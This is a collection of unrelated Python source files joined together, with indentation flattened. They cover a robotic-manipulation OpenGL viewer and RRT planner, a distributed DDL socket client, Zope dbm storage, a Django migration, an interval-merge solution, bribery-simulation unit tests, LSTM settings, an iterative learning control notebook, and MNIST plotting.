for i in range(len(manifold.depths)):
glBegin(GL_POINTS)
cp = manifold.contact_points[i]
glVertex3f(cp[0], cp[1], 1)
glEnd()
glBegin(GL_LINES)
d = manifold.depths[i]
n = manifold.normals[i]
cq = cp - d * n
glVertex3f(cp[0], cp[1], 1)
glVertex3f(cq[0], cq[1], 1)
glEnd()
def draw_ground(self):
glBegin(GL_LINES)
# ground line
glVertex3f(-10, 0, -1)
glVertex3f(10, 0, -1)
# hashes
for x in np.arange(-10, 10, 0.1):
glVertex3f(x, 0, -1)
glVertex3f(x - 0.1, -0.1, -1)
glEnd()
def draw_grid(self, size, step):
glBegin(GL_LINES)
glColor3f(0.3, 0.3, 0.3)
for i in np.arange(step, size, step):
glVertex3f(-size, i, 0) # lines parallel to X-axis
glVertex3f(size, i, 0)
glVertex3f(-size, -i, 0) # lines parallel to X-axis
glVertex3f(size, -i, 0)
glVertex3f(i, -size, 0) # lines parallel to Z-axis
glVertex3f(i, size, 0)
glVertex3f(-i, -size, 0) # lines parallel to Z-axis
glVertex3f(-i, size, 0)
# x-axis
glColor3f(0.5, 0, 0)
glVertex3f(-size, 0, 0)
glVertex3f(size, 0, 0)
# z-axis
glColor3f(0, 0, 0.5)
glVertex3f(0, -size, 0)
glVertex3f(0, size, 0)
glEnd()
def render(self):
glClearColor(0.2, 0.3, 0.3, 1.0)
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
glEnable(GL_DEPTH_TEST)
glEnable(GL_MULTISAMPLE)
glEnable(GL_BLEND)
# glEnable(GL_CULL_FACE)
glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
glPolygonMode(GL_FRONT_AND_BACK, GL_FILL)
self.basic_lighting_shader.use()
print_opengl_error()
model = glm.mat4(1.0)
self.basic_lighting_shader.set_mat4('model', np.asarray(model))
view = self.camera.get_view()
self.basic_lighting_shader.set_mat4('view', np.asarray(view))
projection = glm.perspective(glm.radians(45.0), 1200. / 900, 0.1, 100.0)
self.basic_lighting_shader.set_mat4('projection', np.asarray(projection))
# colors
# self.basic_lighting_shader.set_vec3('objectColor', np.array([1.0, 0.5, 0.31], 'f'))
self.basic_lighting_shader.set_vec3('lightColor', np.array([1.0, 1.0, 1.0], 'f'))
# light
lightPos = glm.vec3([1.00, 1.75, 10.0])
self.basic_lighting_shader.set_vec3('lightPos', np.asarray(lightPos))
# camera
cameraPos = glm.vec3(glm.column(glm.inverse(view), 3))
self.basic_lighting_shader.set_vec3('viewPos', np.asarray(cameraPos))
# Draw object.
if self.draw_mesh:
# Draw obstacles.
self.basic_lighting_shader.set_vec3('objectColor', get_color('gray'))
self.collision_manager.draw(self.basic_lighting_shader.id, True, True)
# Draw object.
self.basic_lighting_shader.set_vec3('objectColor', get_color('clay'))
self.target.draw3d(self.basic_lighting_shader.id)
# Draw normals.
self.normal_shader.use()
self.normal_shader.set_mat4('model', np.asarray(model))
self.normal_shader.set_mat4('view', np.asarray(view))
self.normal_shader.set_mat4('projection', np.asarray(projection))
if self.draw_normals:
self.mesh.draw(self.normal_shader)
# Draw edges and light.
self.lamp_shader.use()
self.lamp_shader.set_mat4('model', np.asarray(model))
self.lamp_shader.set_mat4('view', np.asarray(view))
self.lamp_shader.set_mat4('projection', np.asarray(projection))
self.lamp_shader.set_vec3('objectColor', np.ones((3, 1), 'float32'))
glPolygonMode(GL_FRONT_AND_BACK, GL_LINE)
if self.draw_wireframe:
# Draw object.
self.target.draw3d(self.lamp_shader.id)
glPolygonMode(GL_FRONT_AND_BACK, GL_FILL)
light_model = glm.mat4(1.0)
light_model = glm.translate(light_model, lightPos)
self.lamp_shader.set_mat4('model', np.asarray(light_model))
# self.light_box.draw(self.lamp_shader)
self.lamp_shader.set_mat4('model', np.asarray(model))
self.lamp_shader.set_vec3('objectColor', get_color('teal'))
model = glm.mat4(1.0)
self.lamp_shader.set_vec3('objectColor', np.ones((3, 1), 'float32'))
self.lamp_shader.set_mat4('model', np.asarray(model))
# self.draw_grid(5, 0.25)
def render2(self):
glClearColor(0.2, 0.3, 0.3, 1.0)
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
glEnable(GL_DEPTH_TEST)
glEnable(GL_MULTISAMPLE)
# glEnable(GL_BLEND)
# glEnable(GL_CULL_FACE)
# glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
glPolygonMode(GL_FRONT_AND_BACK, GL_FILL)
# glPolygonMode(GL_FRONT_AND_BACK, GL_LINE)
self.flat_shader.use()
model = glm.mat4(1.0)
self.flat_shader.set_mat4('model', np.asarray(model))
view = glm.mat4(1.0)
self.flat_shader.set_mat4('view', np.asarray(view))
aspect_ratio = 800. / 600.
d = 10
ortho = glm.ortho(-d * aspect_ratio, d * aspect_ratio, -d, d, -100.0, 100.0)
# ortho = glm.ortho(-2*aspect_ratio, 2*aspect_ratio, -2, 2, -100.0, 100.0)
self.flat_shader.set_mat4('projection', np.asarray(ortho))
self.flat_shader.set_vec3('offset', np.zeros((3, 1), 'float32'))
self.flat_shader.set_float('scale', 1.0)
self.flat_shader.set_vec3('objectColor', np.ones((3, 1), 'float32'))
# self.draw_grid(5, 0.25)
# Draw obstacles.
self.flat_shader.set_vec3('objectColor', get_color('gray'))
self.collision_manager.draw(self.flat_shader.id, True, False)
if self.step_on:
# Draw object.
new_m = point_manipulator()
if self.counter >= len(self.path):
self.counter = 0
self.config = self.path[self.counter]
self.manip_p = self.mnp_path[self.counter]
if self.manip_p is not None:
for mnp in self.manip_p:
p = mnp.p
p = p[0:2]
new_m.update_config(np.array(p),self.config)
self.flat_shader.set_vec3('objectColor', get_color('red'))
new_m.obj.draw2d(self.flat_shader.id, True)
self.flat_shader.set_vec3('objectColor', get_color('clay'))
T2 = config2trans(np.array(self.config))
T3 = np.identity(4)
T3[0:2, 3] = T2[0:2, 2]
T3[0:2, 0:2] = T2[0:2, 0:2]
self.target.transform()[:, :] = T3
self.target.draw2d(self.flat_shader.id, True)
# print(self.counter, len(self.path))
time.sleep(0.07)
self.counter += 1
if self.path_on:
glPolygonMode(GL_FRONT_AND_BACK, GL_LINE)
for i in range(len(self.path)):
self.flat_shader.set_vec3('objectColor', get_color('clay'))
target_config = self.path[i]
T2 = config2trans(np.array(target_config))
T3 = np.identity(4)
T3[0:2, 3] = T2[0:2, 2]
T3[0:2, 0:2] = T2[0:2, 0:2]
self.target.transform()[:, :] = T3
self.target.draw2d(self.flat_shader.id, True)
if self.all_configs_on:
glPolygonMode(GL_FRONT_AND_BACK, GL_LINE)
# show all nodes
for node in self.nodes:
self.flat_shader.set_vec3('objectColor', get_color('clay'))
target_config = np.array(node)
T2 = config2trans(target_config)
T3 = np.identity(4)
T3[0:2, 3] = T2[0:2, 2]
T3[0:2, 0:2] = T2[0:2, 0:2]
self.target.transform()[:, :] = T3
self.target.draw2d(self.flat_shader.id, True)
def on_key_press2(self, key, scancode, action, mods):
if key == glfw.KEY_C and action == glfw.PRESS:
self.step_on = False
self.path_on = False
self.all_configs_on = False
if key == glfw.KEY_T and action == glfw.PRESS:
self.step_on = True
if key == glfw.KEY_A and action == glfw.PRESS:
self.all_configs_on = True
if key == glfw.KEY_P and action == glfw.PRESS:
self.path_on = True
def on_key_press(self, key, scancode, action, mods):
pass
# def on_mouse_press(self, x, y, button, modifiers):
# pass
# def on_mouse_drag(self, x, y, dx, dy, buttons, modifiers):
# pass
def on_mouse_press(self, x, y, button, modifiers):
x = 2.0 * (x / 800.0) - 1.0
y = 2.0 * (y / 600.0) - 1.0
if button == 1: # left click
self.camera.mouse_roll(x, y, False)
if button == 4: # right click
self.camera.mouse_zoom(x, y, False)
def on_mouse_drag(self, x, y, dx, dy, buttons, modifiers):
x = 2.0 * (x / 800.0) - 1.0
y = 2.0 * (y / 600.0) - 1.0
if buttons == 1: # left click
self.camera.mouse_roll(x, y)
if buttons == 4: # right click
self.camera.mouse_zoom(x, y)
def get_path(self, path, mnp_path):
self.path = path
self.mnp_path = mnp_path
def get_nodes(self, nodes):
self.nodes = nodes
def get_tree(self, tree):
self.tree = tree
object_shape = [1, 0.2, 0.2, 0.2]
X_dimensions = np.array([(-4.5, 4.5), (2, 3.5), (-2 * np.pi, 2 * np.pi)])
x_init = (0, 2.2, 0)
x_goal = (0, 3, -np.pi / 2)
world_key = 'vert'
dist_weight = 1
mnp_fn_max = 6
goal_kch = [0.01, 0.1, 1]
allow_contact_edges = [True, False, True, False]
viewer = Viewer()
_itbl.loadOpenGL()
manipulator = doublepoint_manipulator()
mnp_fn_max = None
step_length = 2
neighbor_r = 5
dist_cost = 1
app = iTM2d(object_shape, example='book')
viewer.set_renderer(app)
viewer.init()
X = SearchSpace(X_dimensions)
the_object = part(app.target, object_shape, allow_contact_edges)
rrt_tree = RRTManipulation(X, x_init, x_goal, environment(app.collision_manager), the_object, manipulator,
50, neighbor_r, world_key)
x = (-2.3, 2.2, 0)
x_rand = (-2.5, 2.2, -np.pi)
x_rand1 = (-3,3.5,-np.pi/3)
_, envs = rrt_tree.check_collision(x)
mnps = [Contact((-0.8,0.2),(0,-1),0),Contact((-0.8,-0.2),(0,1),0)]
mode = [CONTACT_MODE.FOLLOWING,CONTACT_MODE.FOLLOWING,CONTACT_MODE.SLIDING_LEFT,CONTACT_MODE.LIFT_OFF]
x_new, path, _ = rrt_tree.forward_integration(x,x_rand,envs,mnps,mode)
path += [(-2.432,3,-np.pi/2)]
x_new, path1, _ = rrt_tree.forward_integration(x,x_rand1,envs,mnps,mode)
path += [(-2.432,3,-np.pi/2)]
print(x_new)
print(path)
fig = go.Figure()
boundary = []
for theta in np.arange(0,np.pi/2,0.1):
q = (-3-1*np.cos(theta)+0.2*np.sin(theta), 2+0.2*np.cos(theta)+1*np.sin(theta),-theta)
boundary += [q]
boundary += [(-2.8,3,-np.pi/2)]
for x0 in np.arange(-2.8,-1.1,0.1):
boundary += [(x0,3,-np.pi/2)]
boundary += [(-1.1,3,-np.pi/2)]
b0 = []
for theta in np.arange(0,np.pi/2,0.1):
q = (-1.3-1*np.cos(theta)+0.2*np.sin(theta), 2+0.2*np.cos(theta)+1*np.sin(theta),-theta)
b0 += [q]
b0.reverse()
boundary+=b0
for x0 in np.arange(-4,-2.3,0.1):
boundary += [(x0,2.2,0)]
'''
x1, path1, _ = rrt_tree.forward_integration(x,(-4,2.2,0),envs,mnps,mode)
x2, path2, _ = rrt_tree.forward_integration(x,(-4,2.2,-np.pi/4),envs,mnps,mode)
x3, path3, _ = rrt_tree.forward_integration(x,(-3,2.6,-np.pi/3),envs,mnps,mode)
x4, path4, _ = rrt_tree.forward_integration(x,(-4,3,-np.pi),envs,mnps,mode)
x5, path5, _ = rrt_tree.forward_integration(x,(-0.5,3,-np.pi),envs,mnps,mode)
x6, path6, _ = rrt_tree.forward_integration(x,(-4,3,-np.pi/2.5),envs,mnps,mode)
x7, path7, _ = rrt_tree.forward_integration(x,(-2,3,-np.pi),envs,mnps,mode)
'''
xb, yb, zb = np.array(boundary).T
#xs, ys, zs = np.array(boundary + path+path1+path2+path3+path4+path5+path6+path7).T
x,y,z = np.array(path).T
x1,y1,z1 = np.array(path1).T
fig = go.Figure()
fig.add_trace(go.Scatter3d(x=xb, y=zb, z=yb, mode='lines', line={'width':8, 'color':'blue'},name='Manifold Boundary'))
# fig.add_trace(go.Scatter3d(x=xs, y=ys, z=zs, mode='markers', opacity=0.50))
fig.add_trace(go.Scatter3d(x=x, y=z, z=y, name='trajectory 1', mode='lines+markers',line={'width':4,'color':'green'},marker={'size':4,'color':'green'}))
fig.add_trace(go.Scatter3d(x=x1, y=z1, z=y1,name='trajectory 2', mode='lines+markers',line={'width':4,'color':'red'}, marker={'size':4,'color':'red'}))
fig.add_trace(go.Scatter3d(x=[x_rand[0]], y=[x_rand[2]], z=[x_rand[1]], mode='markers',name = 'goal 1', marker={'size':6,'color':'green'}))
fig.add_trace(go.Scatter3d(x=[x_rand1[0]], y=[x_rand1[2]], z=[x_rand1[1]],mode='markers',name = 'goal 2', marker={'size':6,'color':'red'}))
fig.update_layout(
scene={
'xaxis_title':'x',
'yaxis_title' : 'θ',
'zaxis_title' : 'y',
'aspectmode': 'cube'
})
#fig.write_html("./forward_integration.html")
fig.show()
|
import sys
import sqlite3
from sqlite3 import Error
import time
import threading
from urllib.parse import urlparse
import socket
from socket import error as socket_error
"""
function: init()
parameter: None
return: none
This function will get the value for clustercfg and ddlfile
then declare them as global values
"""
def init():
global clustercfg
global ddlfile
clustercfg = sys.argv[1]
ddlfile = sys.argv[2]
"""
function: do_connect()
parameter: (hash) cp, (string) ddlfile
return: none
This function receive the information about the cluster pc, and ddlfile name
Then it will connect to the server PC(s) and send the config + query
for the server to process. It will print out success, if the query is
successful executed, otherwise it will print out failed.
"""
def do_connect(cp, ddlfile):
mySocket = socket.socket()
try:
mySocket.connect((cp['host'], int(cp['port']) ))
#pc type
data_pc_type = "node"
mySocket.send(data_pc_type.encode())
#listen from server
data = mySocket.recv(1024).decode()
#send pc_config data
data = cp['host'] + ':' + cp['port'] + '/' + cp['db']
mySocket.send(data.encode())
#receive signal from server
data = mySocket.recv(1024).decode()
#send ddlfile name to server
mySocket.send(ddlfile.encode())
#receive output from server
data = mySocket.recv(1024).decode()
print (data)
mySocket.close()
except socket_error as e:
print (e)
"""
function: update_catalog_client()
parameter: (hash) cfg, (string) ddlfile
return: none
This function receive the information about the cluster pc, and ddlfile name
Then it will connect to the catalog server PC(s) and send the config + query
for the server to process. It will print out success, if the query is
successful executed, otherwise it will print out failed.
"""
def update_catalog_client(cfg, cfg_data):
#get catalog hostname from cfg string using
#parseUrl (e.g catalog.hostname=172.17.0.2:50001/mycatdb)
cat_cp = parseUrl(cfg['catalog.hostname'])
mySocket = socket.socket()
try:
mySocket.connect((cat_cp['host'], int(cat_cp['port'])))
#pc type
data_pc_type = "catalog"
mySocket.send(data_pc_type.encode())
#listen from server
data_temp = mySocket.recv(1024).decode()
#send pc_config data
data_cp = cat_cp['host'] + ':' + cat_cp['port'] + '/' + cat_cp['db']
mySocket.send(data_cp.encode())
data_temp = mySocket.recv(1024).decode()
#send cfgFile to server
mySocket.send(cfg_data.encode())
data_temp = mySocket.recv(1024).decode()
print (data_temp)
mySocket.close()
except socket_error as e:
print (e)
"""
function: parseUrl()
parameter: (string) hostname
return: (hash) node
This function receives hostname from clustercfg file as a string. Then it will
parse the string into host, port, and databse name that will contains in a node
that will be returned.
"""
def parseUrl(hostname):
node = {}
o = urlparse(hostname)
data = o.path.split('/')
node['host'] = o.scheme
node['port'] = (data[0])
node['db'] = (data[1])
return node
"""
function: parse_config()
parameter: (string) filename
return: hash (options)
This function receive the filename of the clustercfg file.
Then it will parse and store the information into a hash.
Users can retrieve the information by calling the variable
from the cfgfile
"""
def parse_config(filename):
COMMENT_CHAR = '#'
OPTION_CHAR = '='
options = {}
f = open(filename)
for line in f:
# First, remove comments:
if COMMENT_CHAR in line:
# split on comment char, keep only the part before
line, comment = line.split(COMMENT_CHAR, 1)
# Second, find lines with an option=value:
if OPTION_CHAR in line:
# split on option char:
option, value = line.split(OPTION_CHAR, 1)
# strip spaces:
option = option.strip()
value = value.strip()
# store in dictionary:
options[option] = value
f.close()
return options
"""
function: main()
parameter: none
return: none
Main function of the program
"""
def main():
if len(sys.argv) < 3:
print("Error: You didn't enter enough arguments!")
print("Usage: python3 runDDL.py ./cfgfile ./ddlfile")
sys.exit()
else:
init()
cfg = parse_config(clustercfg)
#get numnodes
numnodes = int(cfg['numnodes'])
#loop through all the nodes
for node in range(1, numnodes + 1):
cp = parseUrl(cfg['node%d.hostname' % node])
t = threading.Thread(target=do_connect(cp,ddlfile))
t.start()
t.join()
# updata catalog table
update_catalog_client(cfg, clustercfg)
if __name__ == '__main__':
main()
|
##############################################################################
#
# Copyright (c) 2001, 2002 Zope Corporation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.0 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE
#
##############################################################################
"""Very Simple dbm-based ZODB storage
This storage provides for use of dbm files as storages that
don't support versions or Undo. This may be useful when implementing
objects like hit counters that don't need or want to participate
in undo or versions.
"""
__version__='$Revision: 1.4 $'[11:-2]
import base64, POSException, time, string, utils
from MappingStorage import MappingStorage
from BaseStorage import BaseStorage
import anydbm, os
class anydbmStorage(MappingStorage):
def __init__(self, filename, flag='r', mode=0666):
BaseStorage.__init__(self, filename)
self._index=anydbm.open(filename, flag, mode)
self._tindex=[]
keys=self._index.keys()
if keys: self._oid=max(keys)
def getSize(self):
# This is a little iffy, since we aren't entirely sure what the file is
self._lock_acquire()
try:
try:
return (os.stat(self.__name__+'.data')[6] +
os.stat(self.__name__+'.dir')[6]
)
except:
try: return os.stat(self.__name__)[6]
except: return 0
finally: self._lock_release()
class gdbmStorage(anydbmStorage):
def __init__(self, filename, flag='r', mode=0666):
BaseStorage.__init__(self, filename)
import gdbm
self._index=index=gdbm.open(filename, flag[:1]+'f', mode)
self._tindex=[]
m='\0\0\0\0\0\0\0\0'
oid=index.firstkey()
while oid != None:
m=max(m, oid)
oid=index.nextkey(oid)
self._oid=m
def getSize(self):
self._lock_acquire()
try: return os.stat(self.__name__)[6]
finally: self._lock_release()
def pack(self, t, referencesf):
self._lock_acquire()
try:
# Build an index of *only* those objects reachable
# from the root.
index=self._index
rootl=['\0\0\0\0\0\0\0\0']
pop=rootl.pop
pindex={}
referenced=pindex.has_key
while rootl:
oid=pop()
if referenced(oid): continue
# Scan non-version pickle for references
r=index[oid]
pindex[oid]=r
p=r[8:]
referencesf(p, rootl)
# Now delete any unreferenced entries:
deleted=[]
oid=index.firstkey()
while oid != None:
if not referenced(oid): deleted.append(oid)
oid=index.nextkey(oid)
pindex=referenced=None
for oid in deleted: del index[oid]
index.sync()
index.reorganize()
finally: self._lock_release()
def _finish(self, tid, user, desc, ext):
index=self._index
for oid, p in self._tindex: index[oid]=p
index.sync()
|
# Generated by Django 2.0.13 on 2019-10-15 08:09
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('cc', '0006_authentication'),
]
operations = [
migrations.RenameField(
model_name='issuetracker',
old_name='Components',
new_name='components',
),
migrations.RenameField(
model_name='mastercomponents',
old_name='Components',
new_name='components',
),
]
|
from typing import List
class Solution:
def merge(self, intervals: List[List[int]]) -> List[List[int]]:
intervals.sort(key=lambda x: (x[0], x[1]))
res = [intervals[0]]
for i in range(1, len(intervals)):
if intervals[i][0] <= res[-1][1]:
res[-1][1] = max(res[-1][1], intervals[i][1])
else:
res.append(intervals[i])
return res |
from unittest import TestCase
from BribeNet.bribery.temporal.action.multiBriberyAction import MultiBriberyAction, \
BriberyActionsAtDifferentTimesException, BriberyActionsOnDifferentGraphsException, \
NoActionsToFormMultiActionException
from BribeNet.bribery.temporal.action import *
from BribeNet.bribery.temporal.action.singleBriberyAction import SingleBriberyAction
from BribeNet.bribery.temporal.nonBriber import NonBriber
from BribeNet.graph.temporal.noCustomerActionGraph import NoCustomerActionGraph
from unittest.mock import MagicMock
# noinspection PyBroadException
class TestMultiBriberyAction(TestCase):
def setUp(self) -> None:
self.bribers = (NonBriber(1), NonBriber(1), NonBriber(1), NonBriber(1))
self.valid_action_dict = {0: {0: 0.5}, 2: {0: 0.5}, 3: {0: 0.5}}
self.graph = NoCustomerActionGraph(self.bribers)
def tearDown(self) -> None:
del self.bribers, self.graph
def test_add_bribe_fails_if_bribe_not_greater_than_zero(self):
action = MultiBriberyAction(self.graph)
self.assertRaises(BribeMustBeGreaterThanZeroException, action.add_bribe, 0, 0, -1.0)
def test_add_bribe_fails_if_node_id_not_present(self):
action = MultiBriberyAction(self.graph)
self.assertRaises(NodeDoesNotExistException, action.add_bribe, 0, -1, 1.0)
def test_add_bribe_fails_if_briber_id_not_present_1(self):
action = MultiBriberyAction(self.graph)
self.assertRaises(BriberDoesNotExistException, action.add_bribe, -1, 0, 1.0)
def test_add_bribe_fails_if_briber_id_not_present_2(self):
action = MultiBriberyAction(self.graph)
self.assertRaises(BriberDoesNotExistException, action.add_bribe, 4, 0, 1.0)
def test_add_bribe_passes_1(self):
action = MultiBriberyAction(self.graph)
action.add_bribe(0, 0, 1.0)
self.assertEqual(action._bribes[0][0], 1.0)
def test_add_bribe_passes_2(self):
action = MultiBriberyAction(self.graph, bribes={0: {0: 1.0}})
action.add_bribe(0, 0, 1.0)
self.assertEqual(action._bribes[0][0], 2.0)
def test_perform_action_fails_when_bribes_exceed_budget(self):
action = MultiBriberyAction(self.graph, bribes={0: {0: 10.0}})
self.assertRaises(BriberyActionExceedsAvailableUtilityException, action.perform_action)
def test_perform_action(self):
action = MultiBriberyAction(self.graph, bribes=self.valid_action_dict)
action.perform_action()
self.assertTrue(action.get_performed())
def test_make_multi_action_from_single_actions_fails_if_on_different_graphs(self):
other_briber = NonBriber(1)
# noinspection PyUnusedLocal
other_graph = NoCustomerActionGraph(other_briber)
action0 = SingleBriberyAction(other_briber)
action1 = SingleBriberyAction(self.bribers[0])
self.assertRaises(BriberyActionsOnDifferentGraphsException,
MultiBriberyAction.make_multi_action_from_single_actions, [action0, action1])
def test_make_multi_action_from_single_actions_fails_if_no_actions(self):
self.assertRaises(NoActionsToFormMultiActionException,
MultiBriberyAction.make_multi_action_from_single_actions, [])
def test_make_multi_action_from_single_actions_fails_if_bribe_not_greater_than_zero(self):
action = SingleBriberyAction(self.bribers[0])
action._bribes[0] = -1.0
self.assertRaises(BribeMustBeGreaterThanZeroException,
MultiBriberyAction.make_multi_action_from_single_actions, [action])
def test_make_multi_action_from_single_actions_fails_if_at_different_times(self):
action0 = SingleBriberyAction(self.bribers[0])
action1 = SingleBriberyAction(self.bribers[1])
action0.get_time_step = MagicMock(return_value=action0.get_time_step()+1)
self.assertRaises(BriberyActionsAtDifferentTimesException,
MultiBriberyAction.make_multi_action_from_single_actions, [action0, action1])
def test_make_multi_action_from_single_actions(self):
single_actions = [SingleBriberyAction(self.bribers[i], self.valid_action_dict[i])
for i in self.valid_action_dict.keys()]
multi_action = MultiBriberyAction.make_multi_action_from_single_actions(single_actions)
self.assertEqual(multi_action._bribes, self.valid_action_dict)
|
import torch
# dataset 参数
batch_size = 128
# word to sequence 参数
min_word_count = 5 #最小词频
max_word_count = None #最大词频
max_features = None #除未知字符和填充字符外,词的最大个数
max_sentence_len = 20 #一个句子的最大长度
embedding_dim = 100 #embedding后每个单词的维度
# LSTM 网络参数
hidden_size = 64
num_layer = 2
bidirectional = True
if bidirectional:
num_direc = 2
else:
num_direc = 1
dropout = 0.5
# GPU训练参数
device = torch.device('cuda' if torch.cuda.is_available() else "cpu")
|
#!/usr/bin/env python
# coding: utf-8
# In[1]:
from control import *
import numpy as np
import matplotlib.pyplot as plt
from scipy import signal
from scipy.signal import *
from scipy.signal import cont2discrete, lti, dlti, dstep
# In[2]:
#reference signal
t = np.linspace(0, 1, 50)
yd = 9*np.sin(3.1*t) ; yd[49] = 0
plt.xlabel('Waktu (s)')
plt.ylabel('Posisi sendi (derajat)')
plt.plot(t,yd,'-')
# In[3]:
#example transfer function
numj1 = np.array([0, 0.2622, 1624])
denj1 = np.array([1, 39.42, 1761])
numj2 = np.array([0, 0.2101, 1312])
denj2 = np.array([1, 35.15, 1374])
numj3 = np.array([0, 0.6385, 1285])
denj3 = np.array([1, 35.74, 1380])
Aj1,Bj1,Cj1,Dj1 = tf2ss(numj1,denj1)
Aj2,Bj2,Cj2,Dj2 = tf2ss(numj2,denj2)
Aj3,Bj3,Cj3,Dj3 = tf2ss(numj3,denj3)
# In[4]:
#tf2zpk(num,den)
# In[5]:
dt = 1/len(t)
Adj1,Bdj1,Cdj1,Ddj1,_ = cont2discrete((Aj1, Bj1, Cj1, Dj1), dt, method='bilinear')
Adj2,Bdj2,Cdj2,Ddj2,_ = cont2discrete((Aj2, Bj2, Cj2, Dj2), dt, method='bilinear')
Adj3,Bdj3,Cdj3,Ddj3,_ = cont2discrete((Aj3, Bj3, Cj3, Dj3), dt, method='bilinear')
# In[6]:
zj1,pj1 = ss2tf(Adj1,Bdj1,Cdj1,Ddj1)
zj2,pj2 = ss2tf(Adj2,Bdj2,Cdj2,Ddj2)
zj3,pj3 = ss2tf(Adj3,Bdj3,Cdj3,Ddj3)
# In[7]:
#from plot_zplane import zplane
#fig, axs = plt.subplots(3, 1,figsize=(30,25),squeeze=False)
#zplane(zj1[0],pj1,'plotj1.png',title='Plot Z-plane J1')
#zplane(zj2[0],pj2,'plotj2.png',title='Plot Z-plane J2')
#zplane(zj3[0],pj3,'plotj3.png',title='Plot Z-plane J3')
# In[150]:
#markov parameters H for minimum phase
#np.set_printoptions(threshold=np.inf)
from numpy.linalg import matrix_power
from numpy.linalg import multi_dot
H = np.zeros(shape=(len(t),len(t)))
for i in range(len(t)):
for j in range(len(t)):
if i == j :
H[i][j] = np.dot(Cdj3,Bdj3)
for k in range(len(t)):
if i - j == k:
H[i][j] = multi_dot([Cdj3,matrix_power(Adj3, k),Bdj3])
print(H)
# In[194]:
#derivative gain
def d_error(e,t=len(t),dt = 0.3):
de = np.zeros(t)
for i in range(t):
if i == 1:
de[i] = (e[i+1] - e[i])/(dt)
elif i == t-1:
de[i] = (e[i] - e[i-1])/(dt)
else :
de[i] = (e[i+1] - e[i-1])/(2*dt)
return de
# In[195]:
plt.plot(t,yd,'o')
#first test signal
Kp = np.zeros(shape=(len(t),len(t))) #matriks NxN proportional gain
np.fill_diagonal(Kp, 0.5)
Kd = np.zeros(shape=(len(t),len(t))) #matriks NxN derivative gain
np.fill_diagonal(Kd, 0.3)
#new input uk
u0 = np.zeros(shape=(len(t),1)) #matriks Nx1
#error reference
error = []
iterasi = 1
iter_save = []
yk_save = []
while True :
Yk = np.dot(H,u0)
e0 = yd - np.transpose(Yk)[0] ; e0[0] = 0
e0 = np.reshape(e0,(len(t),1))
errval = np.sqrt(np.sum(e0**2)/(len(e0)))
error.append(errval)
#try:
#u0 = u0 + np.dot(Lp[iterasi-1],e0) #+ np.dot(Kd,d_error(e0).reshape((len(t),1)))
#except IndexError :
#u0 = u0 + np.dot(np.zeros(shape=(len(t),len(t))),e0)
u0 = u0 + np.dot(Kp,e0) + np.dot(Kd,d_error(e0).reshape((len(t),1)))
#u0 = np.dot(Q, (u0 + np.dot(Kp,e0)))
yk_save.append(Yk)
iter_save.append(iterasi)
iterasi = iterasi + 1
plt.plot(t,Yk)
#if errval < 1e-2 : break
if iterasi > 15 : break
print(errval)
# In[182]:
plt.plot(iter_save, error,'--')
#plt.title('Root Mean Square Error untuk Kp = 0.1')
plt.xlabel('Iteration')
plt.ylabel('RMSE')
# In[184]:
plt.plot(t,yd,'ok',label='Desired trajectory')
plt.plot(t,yk_save[1],'-r',label='1st Iteration')
plt.plot(t,yk_save[5],'-g',label='5th Iteration')
plt.plot(t,yk_save[10],'-b',label='10th Iteration')
#plt.plot(t,yk_save[50],'-y',label='50th Iteration')
plt.title('Hasil Simulasi J3 dengan nilai Kd=0.2')
plt.xlabel('Waktu (s)')
plt.ylabel('Posisi sendi (derajat)')
plt.legend(loc = 'upper right',fontsize='7.4')
#plt.savefig('third_simulation_kp_0.5.png')
#plt.savefig('first_simulation.png')
#plt.savefig('second_simulation.png')
# In[196]:
#calculate eigenvalue
Kp = np.zeros(shape=(len(t),len(t))) #matriks NxN proportional gain
np.fill_diagonal(Kp, 0.5)
Kd = np.zeros(shape=(len(t),len(t))) #matriks NxN derivative gain
np.fill_diagonal(Kd, 0.2)
#np.dot((Kp+Kd),H)
spectral = np.identity(len(t)) - np.dot((Kp+Kd),H)
eig,_ = np.linalg.eig(spectral)
print (np.max(eig))
|
# -*- coding: utf-8 -*-
"""
Created on Wed Jul 3 14:35:53 2019
@author: Antonin
"""
import numpy as np
import matplotlib.pyplot as plt
import pickle as pkl
import seaborn as sns
sns.set(style="ticks")
path="C:/Users/Antonin/Documents/Documents/ENS 2A/Stage M1/Results/2019-07-15/ManualRates/MNIST/length10000000_batches10/T0.010 Memory0 block1 1563285405.516"
original_classes=np.load(path+"/var_original_accuracy.npy",
allow_pickle=True)
shuffle_classes=np.load(path+"/var_shuffle_accuracy.npy",
allow_pickle=True)
original = pkl.load(open(path+"/original", 'rb'))
shuffle = pkl.load(open(path+"/shuffle", 'rb'))
original_class_prediction = np.load(path+'/var_original_classes_prediction.npy', allow_pickle=True)
shuffle_class_prediction = np.load(path+'/var_shuffle_classes_prediction.npy', allow_pickle=True)
fig, ax = plt.subplots(figsize=(9,9))
plt.plot(original)
plt.xlabel("Number of training examples", fontsize=22)
plt.ylabel("Label", fontsize=22)
plt.axvline(200000, ls='--', c='r')
plt.axvline(300000, ls='--', c='r')
plt.axvline(400000, ls='--', c='r')
plt.figure()
plt.plot(shuffle)
plt.xlabel("Number of training examples", fontsize=22)
plt.ylabel("Label", fontsize=22)
ax.tick_params(labelsize=22)
x = np.arange(0,10)
for i in range(0,6,1):
fig, ax = plt.subplots(figsize=(9,9))
barwidth=0.35
plt.bar(x-barwidth/2,original_class_prediction[i,0], width=barwidth, tick_label=[0,1,2,3,4,5,6,7,8,9])
plt.bar(x+barwidth/2,shuffle_class_prediction[i,0], width=barwidth)
plt.legend(['Original', 'Shuffle'], fontsize=22)
plt.xlabel("Class predicted", fontsize=22)
ax.tick_params(labelsize=22)
train_data = pkl.load(open(path+'/train_data', 'rb'))
